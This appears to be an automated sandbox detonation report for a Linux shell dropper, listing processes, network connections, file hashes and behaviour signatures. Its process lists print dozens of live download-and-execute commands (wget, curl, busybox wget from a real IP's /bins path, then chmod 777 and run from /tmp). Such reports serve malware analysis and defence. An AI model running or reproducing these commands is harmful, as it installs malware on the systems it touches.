[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/rm

[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/wget

[wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/chmod

[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D

[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/rm

[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/wget

[wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/chmod

[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif

[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/rm

[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/wget

[wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/chmod

[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb

[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/rm

[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/wget

[wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/chmod

[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe

[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/rm

[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/wget

[wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/chmod

[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK

[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/rm

[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/wget

[wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/chmod

[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/rm

[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/wget

[wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/chmod

[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/rm

[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/wget

[wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/chmod

[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj

[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/rm

[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
US 151.101.193.91:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
GB 89.187.167.3:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
GB 185.125.188.61:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
GB 185.125.188.62:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-29 02:21

Reported

2024-10-29 02:23

Platform

debian9-armhf-20240611-en

Max time kernel

26s

Max time network

29s

Command Line

[/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
N/A /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
N/A /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i N/A
N/A /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F N/A
N/A /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E N/A
N/A /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
N/A /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby N/A
N/A /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA N/A
N/A /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D N/A
N/A /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif N/A
N/A /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
N/A /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe N/A
N/A /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK N/A
N/A /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 N/A
N/A /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i N/A
N/A /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F N/A
N/A /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E N/A
N/A /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /usr/bin/curl N/A
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /usr/bin/curl N/A
File opened for modification /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /usr/bin/curl N/A
File opened for modification /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /usr/bin/curl N/A
File opened for modification /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /usr/bin/curl N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /usr/bin/curl N/A
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /usr/bin/curl N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /usr/bin/curl N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /usr/bin/curl N/A
File opened for modification /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /usr/bin/curl N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /usr/bin/curl N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /usr/bin/curl N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /usr/bin/curl N/A
File opened for modification /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /usr/bin/curl N/A
File opened for modification /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /usr/bin/curl N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /usr/bin/curl N/A
File opened for modification /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /usr/bin/curl N/A
File opened for modification /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /usr/bin/curl N/A

Processes

/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh

[/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/chmod

[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/rm

[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/wget

[wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/chmod

[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj

[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/rm

[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/wget

[wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/chmod

[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/rm

[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/wget

[wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/chmod

[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/rm

[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/wget

[wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/chmod

[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/rm

[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/wget

[wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/chmod

[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/rm

[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/wget

[wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/chmod

[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby

[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/rm

[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/wget

[wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/chmod

[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA

[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/rm

[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/wget

[wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/chmod

[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D

[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/rm

[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/wget

[wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/chmod

[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif

[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/rm

[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/wget

[wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/chmod

[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb

[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/rm

[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/wget

[wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/chmod

[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe

[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/rm

[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/wget

[wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/chmod

[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK

[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/rm

[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/wget

[wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/chmod

[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

